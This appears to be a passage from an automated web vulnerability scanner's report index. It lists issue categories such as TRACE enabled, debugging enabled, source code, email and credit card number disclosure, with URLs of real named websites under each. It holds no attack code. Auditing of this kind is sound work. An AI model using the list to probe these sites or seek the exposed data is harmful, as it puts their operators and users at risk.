11.115. http://www.corecommerce.com/

11.116. http://www.echalk.com/

11.117. http://www.echalk.com/impact/on-the-road/

11.118. http://www.echalk.com/impact/what-echalk-means-to-me/

11.119. http://www.ekkows.0479228880.com/

11.120. http://www.eshopfitters.co.uk/

11.121. http://www.extramusical.com/catalog/index.php

11.122. http://www.falkirk.gov.uk/

11.123. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_australia.gif

11.124. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_belgium.gif

11.125. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_brazil.gif

11.126. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_canada.gif

11.127. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_china.gif

11.128. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_denmark.gif

11.129. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_france.gif

11.130. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_germany.gif

11.131. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_india.gif

11.132. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_italy.gif

11.133. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_japan.gif

11.134. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_korea_south.gif

11.135. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_netherlands.gif

11.136. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_singapore.gif

11.137. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_spain.gif

11.138. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_sweden.gif

11.139. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_switzerland.gif

11.140. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_taiwan.gif

11.141. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_uk.gif

11.142. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_usa.gif

11.143. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/world_map_web.gif

11.144. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/homepage_images/$FILE/ge-corner-low-right.gif

11.145. http://www.gelifesciences.com/aptrix/upp01077.nsf/content/homepage

11.146. http://www.gelifesciences.com/aptrix/upp01077.nsf/content/homepage_country_select

11.147. http://www.gelifesciences.com/ezm/profiles.nsf/CCformat.js

11.148. http://www.gelifesciences.com/ezm/profiles.nsf/ListCountriesAsArray.js

11.149. http://www.gelifesciences.com/ezm/profiles.nsf/ListInitialCountryRedirectsAsArray.js

11.150. http://www.gelifesciences.com/favicon.ico

11.151. http://www.gelifesciences.com/icons/ecblank.gif

11.152. http://www.gelifesciences.com/images/flags/default_flag.gif

11.153. http://www.gelifesciences.com/newheaderimages/cart.gif

11.154. http://www.gelifesciences.com/newheaderimages/gelslogo4.gif

11.155. http://www.gelifesciences.com/newheaderimages/gles2.gif

11.156. http://www.gelifesciences.com/newheaderimages/nav1link.gif

11.157. http://www.gelifesciences.com/newheaderimages/top_nav_bg.GIF

11.158. http://www.gelifesciences.com/newheaderimages/top_nav_blue_arrow.GIF

11.159. http://www.gelifesciences.com/newheaderimages/top_nav_divider.gif

11.160. http://www.gelifesciences.com/newheaderimages/top_nav_left_end.gif

11.161. http://www.gelifesciences.com/newheaderimages/top_nav_right_end.gif

11.162. http://www.gelifesciences.com/servlet/J5P

11.163. http://www.gitzitinc.com/store/

11.164. http://www.googleadservices.com/pagead/aclk

11.165. http://www.greatfabricsonline.com/

11.166. http://www.internetnatrgovina.com/

11.167. http://www.ipandgo.net/

11.168. http://www.mmabasket.com/

11.169. http://www.nexternal.com/ecommerce/oscommerce_shopping_cart.asp

11.170. https://www.regnow.com/checkout/cart/edit

11.171. https://www.regnow.com/checkout/cart/new/13799-1/13799-2

11.172. https://www.regnow.com/checkout/cart/view

11.173. http://www.sapiens.co.uk/

11.174. http://www.shopgrandmasattic.com/

11.175. http://www.teleflora.com/js/tf_homepagejs.asp

11.176. http://www.vehix.com/

11.177. http://www.vehix.com/

11.178. http://www.vehix.com/!.gif

11.179. http://www.vehix.com/Default.css

11.180. http://www.vehix.com/Scripts/Framework/jquery-1.4.1.js

11.181. http://www.vehix.com/__ssobj/ard.png

11.182. http://www.vehix.com/_css/Buttons/Main.css

11.183. http://www.vehix.com/_css/Buttons/Search.css

11.184. http://www.vehix.com/_css/Themes/VehixAds.css

11.185. http://www.vehix.com/_css/Themes/VehixMain.css

11.186. http://www.vehix.com/_images/Backgrounds/PageContentShadow_1003x50.jpg

11.187. http://www.vehix.com/_images/Backgrounds/SYC_Background_307x134.png

11.188. http://www.vehix.com/_images/Backgrounds/ToolbarShadow_10x10.png

11.189. http://www.vehix.com/_images/Backgrounds/VehixToolbarBackground.jpg

11.190. http://www.vehix.com/_images/Backgrounds/grayBevel_10x9.gif

11.191. http://www.vehix.com/_images/Backgrounds/grayGradient_682x156.jpg

11.192. http://www.vehix.com/_images/Backgrounds/vehixBodyBackground.jpg

11.193. http://www.vehix.com/_images/Backgrounds/whiteBevel_10x9.gif

11.194. http://www.vehix.com/_images/Buttons/Continue_109x25.gif

11.195. http://www.vehix.com/_images/Buttons/Dynamic/BlueC_1x25.gif

11.196. http://www.vehix.com/_images/Buttons/Dynamic/BlueL_8x25.gif

11.197. http://www.vehix.com/_images/Buttons/Dynamic/BlueR_8x25.gif

11.198. http://www.vehix.com/_images/Buttons/SearchUsed_109x25.gif

11.199. http://www.vehix.com/_images/Buttons/Story1_20x19.gif

11.200. http://www.vehix.com/_images/Buttons/Story2_20x19.gif

11.201. http://www.vehix.com/_images/Buttons/Story3_20x19.gif

11.202. http://www.vehix.com/_images/Buttons/Story4_20x19.gif

11.203. http://www.vehix.com/_images/Buttons/Story5_20x19.gif

11.204. http://www.vehix.com/_images/Buttons/ToolbarGreen_55x21.gif

11.205. http://www.vehix.com/_images/Icons/MagnifyingGlass_13x13.gif

11.206. http://www.vehix.com/_images/Icons/Person_11x13.gif

11.207. http://www.vehix.com/_images/Logos/FindYourRide_89x36.gif

11.208. http://www.vehix.com/_images/Logos/Vehix_115x36.gif

11.209. http://www.vehix.com/_images/Separators/Toolbar.gif

11.210. http://www.vehix.com/_images/Separators/Vertical84_1x18.gif

11.211. http://www.vehix.com/_images/Separators/horizontalGray2Tone.gif

11.212. http://www.vehix.com/_images/Separators/verticalGray2Tone.gif

11.213. http://www.vehix.com/_images/newsletter_1.png

11.214. http://www.vehix.com/_images/spacer.gif

11.215. http://www.vehix.com/_js/Vehix.Web.Consumer.Portal.Main.js

11.216. http://www.vehix.com/_js/framework/jquery-1.4.2.min.js

11.217. http://www.vehix.com/_scripts/Vehix.Collections.js

11.218. http://www.vehix.com/_scripts/Vehix.Presentation.Research.js

11.219. http://www.vehix.com/_scripts/Vehix.Presentation.js

11.220. http://www.vehix.com/_scripts/s_code.js

11.221. http://www.vehix.com/_styleSheets/tagFrame.css

11.222. http://www.vehix.com/_styleSheets/userControlsResearchSelector.css

11.223. http://www.vehix.com/_userControls/HeadlineModule.css

11.224. http://www.vehix.com/_userControls/HeadlineModule.js

11.225. http://www.vehix.com/_userControls/HeroSpot.css

11.226. http://www.vehix.com/_userControls/HomePageLatestReviews.css

11.227. http://www.vehix.com/_userControls/RequiredZip.css

11.228. http://www.vehix.com/_userControls/SelectCategoryModule.css

11.229. http://www.vehix.com/_userControls/researchYourNextCar.css

11.230. http://www.vehix.com/_userControls/top10FeaturedControl.css

11.231. http://www.vehix.com/_userControls/usedVehicleSearchPanel.css

11.232. http://www.vehix.com/dealer/_userControls/FindLocalDealers.css

11.233. http://www.vehix.com/favicon.ico

11.234. http://www.vehix.com/research/_userControls/FreePriceQuotePanel.css

11.235. http://www.vehix.com/research/_userControls/SelectMakeModule.css

11.236. http://www.vehix.com/research/_userControls/SponsorModule.css

11.237. http://www.vehix.com/research/_userControls/YearSelectionModule.css

11.238. http://www.vehix.com/video/_images/play_arrow24x24.png

11.239. http://www.verizonbusiness.com/us/

11.240. http://www.vitexo.de/

11.241. http://www.vitexo.de/support/server.php

11.242. http://x.ligatus.com/blank.gif

11.243. http://x.ligatus.com/cgi-bin/ivw/CP/20468-1220/79-822/97603-57123-_96851-70827-_95287-47761-//

12. Password field with autocomplete enabled

12.1. http://forum.mailsite.com/

12.2. https://mobile.westnet.com.au/

12.3. https://mobile.westnet.com.au/Default.aspx

12.4. https://myaccount.westnet.com.au/Login.aspx

12.5. https://secure1.wn.com.au/agents/login.aspx

12.6. https://shop.widevoip.com/authentication.php

12.7. https://webmail.westnet.com.au/

12.8. http://www.allvoip.gr/

12.9. http://www.allvoip.gr/

12.10. http://www.ekkows.0479228880.com/

12.11. http://www.host7x24.com/auth/login.php

12.12. http://www.internetnatrgovina.com/

12.13. http://www.mailsite.com/portal/

12.14. http://www.mailsite.com/portal/cases/

12.15. http://www.mailsite.com/portal/cases/cases.asp

12.16. http://www.mailsite.com/portal/download.asp

12.17. http://www.mailsite.com/portal/unsubscribe.asp

12.18. http://www.mailsite.com/portal/updateprofile.asp

12.19. http://www.mavi1.org/forum/

12.20. http://www.mmabasket.com/

12.21. https://www.new.onebox.com/login

12.22. http://www.siyamiozkan.com.tr/forum/

12.23. http://www.siyamiozkan.com.tr/forum/

12.24. http://www.vitexo.de/

12.25. http://www.westnet.com.au/fetchtv/

12.26. http://www.westnet.com.au/fetchtv/

12.27. http://www.westnet.com.au/fetchtv/

12.28. http://www.westnet.com.au/help/images/bgs/main1.gif

12.29. http://www.westnet.com.au/help/images/bgs/main1.gif

12.30. http://www.westnet.com.au/help/images/bgs/main1.gif

12.31. http://www.westnet.com.au/help/images/bgs/top_nav_bg.gif

12.32. http://www.westnet.com.au/help/images/bgs/top_nav_bg.gif

12.33. http://www.westnet.com.au/help/images/bgs/top_nav_bg.gif

12.34. http://www.westnet.com.au/help/images/nav/nav_light_blue.gif

12.35. http://www.westnet.com.au/help/images/nav/nav_light_blue.gif

12.36. http://www.westnet.com.au/help/images/nav/nav_light_blue.gif

12.37. http://www.westnet.com.au/help/images/nav/ovr-1.gif

12.38. http://www.westnet.com.au/help/images/nav/ovr-1.gif

12.39. http://www.westnet.com.au/help/images/nav/ovr-1.gif

12.40. http://www.westnet.com.au/help/images/nav/ovr-2.gif

12.41. http://www.westnet.com.au/help/images/nav/ovr-2.gif

12.42. http://www.westnet.com.au/help/images/nav/ovr-2.gif

12.43. http://www.westnet.com.au/help/images/nav/ovr-3.gif

12.44. http://www.westnet.com.au/help/images/nav/ovr-3.gif

12.45. http://www.westnet.com.au/help/images/nav/ovr-3.gif

12.46. http://www.westnet.com.au/help/images/nav/ovr-4.gif

12.47. http://www.westnet.com.au/help/images/nav/ovr-4.gif

12.48. http://www.westnet.com.au/help/images/nav/ovr-4.gif

12.49. http://www.westnet.com.au/help/images/nav/ovr-5.gif

12.50. http://www.westnet.com.au/help/images/nav/ovr-5.gif

12.51. http://www.westnet.com.au/help/images/nav/ovr-5.gif

12.52. http://www.westnet.com.au/help/images/nav/ovr-6.gif

12.53. http://www.westnet.com.au/help/images/nav/ovr-6.gif

12.54. http://www.westnet.com.au/help/images/nav/ovr-6.gif

12.55. http://www.westnet.com.au/index.html

12.56. http://www.westnet.com.au/index.html

12.57. http://www.westnet.com.au/index.html

12.58. http://www.westnet.com.au/js/components/iptvnumberchecker/component_iptvnumberchecker.nocache.js

12.59. http://www.westnet.com.au/js/components/iptvnumberchecker/component_iptvnumberchecker.nocache.js

12.60. http://www.westnet.com.au/js/components/iptvnumberchecker/component_iptvnumberchecker.nocache.js

12.61. http://www.westnet.com.au/products/residential.html

12.62. http://www.westnet.com.au/products/residential.html

12.63. http://www.westnet.com.au/products/residential.html

13. Source code disclosure

13.1. http://printingcanvas.co.uk/

13.2. http://www.hp.com/cma/ng/lib/hpanalytics_common.js

14. ASP.NET debugging enabled

14.1. http://www.active24.co.uk/Default.aspx

14.2. http://www.active24.com/Default.aspx

14.3. http://www.active24.no/Default.aspx

14.4. http://www.cisp.com/Default.aspx

15. Referer-dependent response

15.1. http://chileadmin.com/phpinfo.php

15.2. http://pixel.fetchback.com/serve/fb/pdc

15.3. http://www.facebook.com/plugins/like.php

15.4. http://www.facebook.com/plugins/likebox.php

15.5. http://www.yourwebsitevalue.com/getsearchbox.cgi

15.6. http://www.youtube.com/v/ERP00q_xcuQ

16. Cross-domain POST

16.1. http://www.eshopfitters.co.uk/

16.2. http://www.eshopfitters.co.uk/recent_projects.php

16.3. http://www.eshopfitters.co.uk/recent_projects_info.php

17. Cross-domain Referer leakage

17.1. http://ad.doubleclick.net/adj/veh.homepage.dfp/null/null/null/null/Vehix/sechp

17.2. http://ad.yieldmanager.com/pixel

17.3. http://cm.g.doubleclick.net/pixel

17.4. http://cm.g.doubleclick.net/pixel

17.5. http://cm.g.doubleclick.net/pixel

17.6. http://fls.doubleclick.net/activityi

17.7. http://fls.doubleclick.net/activityi

17.8. http://fls.doubleclick.net/activityi

17.9. http://freezone.iinet.net.au/channels/freezone-partners

17.10. http://googleads.g.doubleclick.net/pagead/ads

17.11. http://googleads.g.doubleclick.net/pagead/ads

17.12. http://googleads.g.doubleclick.net/pagead/ads

17.13. http://ib.adnxs.com/seg

17.14. http://j.tmimgcdn.com/main.js

17.15. https://myaccount.westnet.com.au/Login.aspx

17.16. http://myhelp.westnet.com.au/pages/releaseview.action

17.17. http://onebox.extole.com/offers/23073174/share

17.18. http://pixel.fetchback.com/serve/fb/pdc

17.19. http://printingcanvas.co.uk/your-print-canvas-c-21.html

17.20. https://secure1.wn.com.au/agents/login.aspx

17.21. http://shops.oscommerce.com/live_shops_frameset_header.php

17.22. http://shops.oscommerce.com/live_shops_frameset_header.php

17.23. http://shops.oscommerce.com/live_shops_frameset_header.php

17.24. http://shops.oscommerce.com/live_shops_frameset_header.php

17.25. http://shops.oscommerce.com/live_shops_frameset_header.php

17.26. http://shops.oscommerce.com/live_shops_frameset_header.php

17.27. http://shops.oscommerce.com/live_shops_frameset_header.php

17.28. http://shops.oscommerce.com/live_shops_frameset_header.php

17.29. http://shops.oscommerce.com/live_shops_frameset_header.php

17.30. http://shops.oscommerce.com/live_shops_frameset_header.php

17.31. http://shops.oscommerce.com/live_shops_frameset_header.php

17.32. http://shops.oscommerce.com/live_shops_frameset_header.php

17.33. http://shops.oscommerce.com/live_shops_frameset_header.php

17.34. http://shops.oscommerce.com/live_shops_frameset_header.php

17.35. http://shops.oscommerce.com/live_shops_frameset_header.php

17.36. http://shops.oscommerce.com/live_shops_frameset_header.php

17.37. http://shops.oscommerce.com/live_shops_frameset_header.php

17.38. http://shops.oscommerce.com/live_shops_frameset_header.php

17.39. http://shops.oscommerce.com/live_shops_frameset_header.php

17.40. http://shops.oscommerce.com/live_shops_frameset_header.php

17.41. http://shops.oscommerce.com/live_shops_frameset_header.php

17.42. http://shops.oscommerce.com/live_shops_frameset_header.php

17.43. http://store.mandriva.com/just_added.php

17.44. http://store.mandriva.com/product_info.php

17.45. http://tags.mediaforge.com/pix/189/

17.46. http://www.active24.co.uk/custom_asp/defaultjs.asp

17.47. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

17.48. http://www.corecommerce.com/

17.49. http://www.eshopfitters.co.uk/recent_projects.php

17.50. http://www.eshopfitters.co.uk/recent_projects_info.php

17.51. http://www.eshopfitters.co.uk/recent_projects_info.php

17.52. http://www.extramusical.com/livehelp/livehelp_js.php

17.53. http://www.facebook.com/plugins/like.php

17.54. http://www.facebook.com/plugins/like.php

17.55. http://www.facebook.com/plugins/likebox.php

17.56. http://www.facebook.com/plugins/likebox.php

17.57. http://www.facebook.com/plugins/likebox.php

17.58. http://www.facebook.com/plugins/likebox.php

17.59. http://www.facebook.com/plugins/likebox.php

17.60. http://www.facebook.com/plugins/likebox.php

17.61. http://www.facebook.com/plugins/likebox.php

17.62. http://www.facebook.com/plugins/likebox.php

17.63. http://www.facebook.com/plugins/likebox.php

17.64. http://www.gelifesciences.com/servlet/J5P

17.65. http://www.google.com/search

17.66. http://www.munichmyway.com/

17.67. http://www.munichmyway.com/ecommerce/products/prodDetail.cfm

17.68. http://www.nexternal.com/ecommerce/oscommerce_shopping_cart.asp

17.69. http://www.oscommerce-manager.com/

17.70. http://www.redstage.com/magento2/

17.71. http://www.vehix.com/

17.72. http://www.vehix.com/

17.73. http://www.vehix.com/tagFrame.aspx

17.74. http://www.vehix.com/tagFrame.aspx

17.75. http://www.verizonbusiness.com/us/topnav.xml

17.76. http://www8.hp.com/us/en/services/services-detail.html

18. Cross-domain script include

18.1. http://finans.turk.net/altin/

18.2. http://finans.turk.net/borsa/

18.3. http://fls.doubleclick.net/activityi

18.4. http://forums.oscommerce.com/

18.5. http://freezone.iinet.net.au/channels/

18.6. http://freezone.iinet.net.au/channels/freezone-partners

18.7. http://freezone.iinet.net.au/channels/freezone/sport

18.8. http://googleads.g.doubleclick.net/pagead/ads

18.9. http://googleads.g.doubleclick.net/pagead/ads

18.10. http://onebox.extole.com/offers/23073174/share

18.11. http://pixel.fetchback.com/serve/fb/pdc

18.12. http://printingcanvas.co.uk/

18.13. http://printingcanvas.co.uk/your-print-canvas-c-21.html

18.14. https://secure1.wn.com.au/agents/login.aspx

18.15. https://secure1.wn.com.au/agents/lost_password.aspx

18.16. http://welcome.hp.com/country/w1/en/support.html

18.17. http://whatsonsingapore.com/

18.18. http://www.allvoip.gr/

18.19. http://www.antarctica.gov.au/

18.20. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

18.21. http://www.casagrandehospital.com/

18.22. http://www.corecommerce.com/

18.23. http://www.echalk.com/

18.24. http://www.echalk.com/impact/on-the-road/

18.25. http://www.echalk.com/impact/what-echalk-means-to-me/

18.26. http://www.eshopfitters.co.uk/

18.27. http://www.eshopfitters.co.uk/recent_projects.php

18.28. http://www.eshopfitters.co.uk/recent_projects_info.php

18.29. http://www.extramusical.com/catalog/index.php

18.30. http://www.ezosc.com/

18.31. http://www.facebook.com/plugins/like.php

18.32. http://www.facebook.com/plugins/likebox.php

18.33. http://www.gelifesciences.com/aptrix/upp01077.nsf/content/homepage_country_select

18.34. http://www.mailsite.com/

18.35. http://www.mailsite.com/Contacts/default.asp

18.36. http://www.mailsite.com/company/customers.asp

18.37. http://www.mailsite.com/contacts/

18.38. http://www.mailsite.com/portal/

18.39. http://www.mailsite.com/portal/cases/

18.40. http://www.mailsite.com/portal/cases/cases.asp

18.41. http://www.mailsite.com/portal/download.asp

18.42. http://www.mailsite.com/portal/trial.asp

18.43. http://www.mailsite.com/portal/unsubscribe.asp

18.44. http://www.mailsite.com/portal/updateprofile.asp

18.45. http://www.mailsite.com/products/MailSite-version-9-Whats-New.asp

18.46. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

18.47. http://www.mailsite.com/services/avupdates/

18.48. http://www.mailsite.com/support/

18.49. http://www.medianewsgroup.com/Pages/default.aspx

18.50. http://www.new.onebox.com/home

18.51. http://www.nexternal.com/ecommerce/oscommerce_shopping_cart.asp

18.52. http://www.oscommerce.com/about/news,135

18.53. http://www.pepperdine.edu/

18.54. http://www.redstage.com/magento2/

18.55. https://www.regnow.com/checkout/cart/edit

18.56. https://www.regnow.com/checkout/cart/view

18.57. http://www.teleflora.com/

18.58. http://www.templatemonster.com/oscommerce-templates.php

18.59. http://www.turk.net/

18.60. http://www.upc.nl/upclive/

18.61. http://www.vehix.com/

18.62. http://www.victoria.ac.nz/home/

18.63. http://www5.turk.net/twitter_net/default.aspx

18.64. http://www8.hp.com/us/en/services/it-services.html

18.65. http://www8.hp.com/us/en/services/services-detail.html

19. TRACE method is enabled

19.1. http://a.ligatus.com/

19.2. http://allvoip.gr/

19.3. http://chadon.nl/

19.4. http://count1.123stat.com/

19.5. http://d.xp1.ru4.com/

19.6. http://d1.openx.org/

19.7. http://intlstore.mozilla.org/

19.8. http://mods4rides.com/

19.9. http://pixel.fetchback.com/

19.10. http://shop.widevoip.com/

19.11. https://shop.widevoip.com/

19.12. http://store.mandriva.com/

19.13. http://support.magneticone.com/

19.14. http://upc.d2.sc.omtrdc.net/

19.15. http://www.allvoip.gr/

19.16. http://www.amberetc.co.uk/

19.17. http://www.antarctica.gov.au/

19.18. http://www.brodit24.de/

19.19. http://www.casagrandehospital.com/

19.20. http://www.cvtelecom.cv/

19.21. http://www.echalk.com/

19.22. http://www.ezosc.com/

19.23. http://www.internetnatrgovina.com/

19.24. http://www.ipandgo.net/

19.25. http://www.mavi1.org/

19.26. http://www.mavideniz1.org/

19.27. http://www.oscommerce-manager.com/

19.28. http://www.redstage.com/

19.29. http://www.servercentral.com/

19.30. http://www.siyamiozkan.com.tr/

19.31. http://www.upc.nl/

19.32. http://www.vitexo.de/

19.33. https://www.widevoip.com/

19.34. http://www.yourwebsitevalue.com/

20. Directory listing

21. Email addresses disclosed

21.1. http://acceleart.com/shop/mts/ext/equalheight/equalheight.js

21.2. http://ah8.facebook.com/js/conversions/tracking.js

21.3. http://cdn.betaeasy.com/betaeasy.js

21.4. http://chadon.nl/

21.5. http://chileadmin.com/phpinfo.php

21.6. http://forums.oscommerce.com/

21.7. http://freezone.iinet.net.au/js/jquery.cookie.js

21.8. http://h18030.www1.hp.com/survey/source/enterprise1_2.js

21.9. http://h18030.www1.hp.com/survey/source/na_enterprise.js

21.10. http://myhelp.westnet.com.au/display/home/2008/03/14/Hoax+Email+and+Internet+Security+Alert

21.11. http://myhelp.westnet.com.au/pages/releaseview.action

21.12. http://myhelp.westnet.com.au/s/1116/1/_/labels-javascript

21.13. http://shops.oscommerce.com/live_shops_frameset_header.php

21.14. http://store.mandriva.com/just_added.php

21.15. http://teleflora.edgesuite.net/images/vendors/00005557/omniture/s_code.js

21.16. http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css

21.17. http://www.3dcart.com/oscommerce_vs_3dcart.html

21.18. http://www.accesscontrolid.com/catalog/index.php

21.19. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

21.20. http://www.cardinal.com/businesses/medicineshoppe/

21.21. http://www.cardinal.com/mps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/mps/themes/html/Cardinal/js/jquery.hoverIntent.js

21.22. http://www.cisp.com/

21.23. http://www.cisp.com/products/cisp/restora_backup/

21.24. http://www.corecommerce.com/js/jquery.innerfade.js

21.25. http://www.echalk.com/js/jquery.colorbox.js

21.26. http://www.eshopfitters.co.uk/

21.27. http://www.eshopfitters.co.uk/recent_projects.php

21.28. http://www.eshopfitters.co.uk/recent_projects_info.php

21.29. http://www.ezosc.com/

21.30. http://www.falkirk.gov.uk/home.aspx

21.31. http://www.gelifesciences.com/servlet/J5P

21.32. http://www.gelifesciences.com/servlet/J5P

21.33. http://www.gitzitinc.com/store/

21.34. http://www.google.com/s

21.35. http://www.hp.com/cma/metrics/survey/na_num_clicks.js

21.36. http://www.mailsite.com/

21.37. http://www.mailsite.com/Contacts/default.asp

21.38. http://www.mailsite.com/company/customers.asp

21.39. http://www.mailsite.com/contacts/

21.40. http://www.mailsite.com/nav_functions.js

21.41. http://www.mailsite.com/portal/

21.42. http://www.mailsite.com/portal/cases/

21.43. http://www.mailsite.com/portal/cases/cases.asp

21.44. http://www.mailsite.com/portal/download.asp

21.45. http://www.mailsite.com/portal/trial.asp

21.46. http://www.mailsite.com/portal/unsubscribe.asp

21.47. http://www.mailsite.com/portal/updateprofile.asp

21.48. http://www.mailsite.com/products/MailSite-version-9-Whats-New.asp

21.49. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

21.50. http://www.mailsite.com/services/avupdates/

21.51. http://www.mailsite.com/support/

21.52. http://www.mavideniz1.org/forum/

21.53. http://www.medianewsgroup.com/_catalogs/masterpage/SiteCatalystCode_H_17.js

21.54. http://www.new.onebox.com/home

21.55. http://www.new.onebox.com/how-it-works

21.56. http://www.new.onebox.com/onebox-cms-public/dms/common/javascript/mootools1-2_corenmore.js

21.57. http://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/javascript/loginFunctions.js

21.58. http://www.new.onebox.com/pricing-receptionist

21.59. https://www.new.onebox.com/features/mobile-apps/android

21.60. https://www.new.onebox.com/features/mobile-apps/blackberry

21.61. https://www.new.onebox.com/features/mobile-apps/iphone

21.62. https://www.new.onebox.com/login

21.63. https://www.new.onebox.com/onebox-cms-public/dms/common/javascript/mootools1-2_corenmore.js

21.64. https://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/javascript/loginFunctions.js

21.65. https://www.new.onebox.com/pricing-receptionist_b

21.66. http://www.pepperdine.edu/scripts/app-autocomplete/google-www-report.xml

21.67. http://www.plaxo.com/css/m/js/abc_launcher.js

21.68. http://www.plaxo.com/css/m/js/basic.js

21.69. http://www.redstage.com/magento2/

21.70. http://www.redstage.com/magento2/js/colorbox/jquery.colorbox-min.js

21.71. https://www.regnow.com/checkout/cart/edit

21.72. https://www.regnow.com/checkout/cart/new/13799-1/13799-2

21.73. https://www.regnow.com/checkout/cart/view

21.74. https://www.regnow.com/eds_new.html

21.75. https://www.regnow.com/favicon.ico

21.76. http://www.servercentral.com/accountcenter

21.77. http://www.servercentral.com/agentspartners

21.78. http://www.servercentral.com/billinginquiry

21.79. http://www.servercentral.com/billingpaymentfaqs

21.80. http://www.servercentral.com/makeapayment

21.81. http://www.servercentral.com/support

21.82. http://www.servercentral.com/whyservercentral

21.83. http://www.telecom.pt/InternetResource/PTSite/PT

21.84. http://www.telecom.pt/InternetResource/PTSite/PT/Canais/Sustentabilidade/

21.85. http://www.turk.net/Assets/scripts/jQuery/jquery.innerfade.js

21.86. http://www.vehix.com/_scripts/s_code.js

21.87. http://www.westnet.com.au/fetchtv/

21.88. http://www.westnet.com.au/js/jquery.cookie.js

21.89. http://www.wiktel.com/

21.90. http://www8.hp.com/us/en/scripts/mootools-1.2.4-more-yc.js

22. Private IP addresses disclosed

22.1. http://ah8.facebook.com/js/conversions/tracking.js

22.2. http://connect.facebook.net/tr_TR/all.js

22.3. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.4. http://www.facebook.com/extern/login_status.php

22.5. http://www.facebook.com/extern/login_status.php

22.6. http://www.facebook.com/extern/login_status.php

22.7. http://www.facebook.com/extern/login_status.php

22.8. http://www.facebook.com/extern/login_status.php

22.9. http://www.facebook.com/extern/login_status.php

22.10. http://www.facebook.com/extern/login_status.php

22.11. http://www.facebook.com/extern/login_status.php

22.12. http://www.facebook.com/plugins/like.php

22.13. http://www.facebook.com/plugins/like.php

22.14. http://www.facebook.com/plugins/like.php

22.15. http://www.facebook.com/plugins/like.php

22.16. http://www.facebook.com/plugins/likebox.php

22.17. http://www.facebook.com/plugins/likebox.php

22.18. http://www.facebook.com/plugins/likebox.php

22.19. http://www.facebook.com/plugins/likebox.php

22.20. http://www.facebook.com/plugins/likebox.php

22.21. http://www.facebook.com/plugins/likebox.php

22.22. http://www.facebook.com/plugins/likebox.php

22.23. http://www.facebook.com/plugins/likebox.php

22.24. http://www.facebook.com/plugins/likebox.php

22.25. http://www.facebook.com/plugins/likebox.php

22.26. http://www.facebook.com/plugins/likebox.php

22.27. http://www.facebook.com/plugins/likebox.php

22.28. http://www.facebook.com/plugins/likebox.php

22.29. http://www.facebook.com/plugins/likebox.php

22.30. http://www.facebook.com/plugins/likebox.php

23. Credit card numbers disclosed

23.1. http://googleads.g.doubleclick.net/pagead/ads

23.2. http://www.extramusical.com/catalog/index.php

23.3. http://www.servercentral.com/files/u1/Credit_Card_Authorization_2-2.pdf

24. Robots.txt file

24.1. http://423-jqs-965.mktoresp.com/webevents/visitWebPage

24.2. http://ad.doubleclick.net/activity

24.3. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js

24.4. http://allvoip.gr/favicon.ico

24.5. http://c.gelifesciences.com/b/ss/gelifegelifeprod/1/H.15.1/s61482006243895

24.6. http://cm.g.doubleclick.net/pixel

24.7. http://count1.123stat.com/count.pl

24.8. http://d.xp1.ru4.com/um

24.9. http://d1.openx.org/ajs.php

24.10. http://feeds.bbci.co.uk/news/rss.xml

24.11. http://fls.doubleclick.net/activityi

24.12. http://forums.oscommerce.com/

24.13. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071977981/

24.14. http://h41174.www4.hp.com/4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

24.15. http://hp-www.baynote.net/baynote/tags3/common

24.16. http://iinet.122.2o7.net/b/ss/iinet-wn-prd,%20iinet-westnet-prd/1/H.21/s66183478690218

